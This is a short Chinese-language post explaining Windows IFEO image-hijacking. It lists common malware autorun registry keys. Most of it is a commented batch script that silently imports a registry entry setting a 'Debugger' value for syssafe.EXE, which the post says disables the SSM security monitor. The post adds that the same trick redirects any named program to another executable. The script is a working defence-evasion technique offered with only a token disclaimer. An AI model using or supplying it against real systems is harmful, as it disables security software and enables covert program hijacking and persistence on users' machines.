windows映像劫持技術（IFEO）介紹

QUOTE:

基本癥狀：可能有朋友遇到過這樣的情況，一個正常的程式，無論把他放在哪個位置或者是重新用安裝盤修複過的程式，都無法運行或者是比如運行A卻成了執行B的程式了，而改名後卻可以正常運行。。

既然我們是介紹IFEO技術相關，那我們就先介紹下：

一，什麼是映像脅持（IFEO）？

所謂的IFEO就是Image File Execution Options

在是位於註冊表的
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

由於這個項主要是用來偵錯工具用的，對一般使用者意義不大。預設是只有管理員和local system有權讀寫修改

先看看常規病毒等怎麼修改註冊表吧。。

那些病毒、蠕蟲和，木馬等仍然使用眾所皆知並且過度使用的註冊表索引值，如下：
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
等等。。。。。。。。。。。。。。。

二，具體使用資料：

@echo off   //關閉命令回顯
echo 此批處理只作技巧介紹，請勿用於非法活動！//顯示echo後的文字
pause   //停止
echo Windows Registry Editor Version 5.00>>ssm.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\syssafe.EXE] >>ssm.reg
echo "Debugger"="syssafe.EXE" >>ssm.reg   //把echo後的文字匯出到SSM.reg中
regedit /s ssm.reg &del /q ssm.reg   //匯入ssm.reg並刪除

使SSM失效HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe項下的"Debugger"="abc.exe" 意思是不執行svchost.exe而執行abc.exe

使用這個方法，可以把特定的名稱的exe檔案的執行重新導向。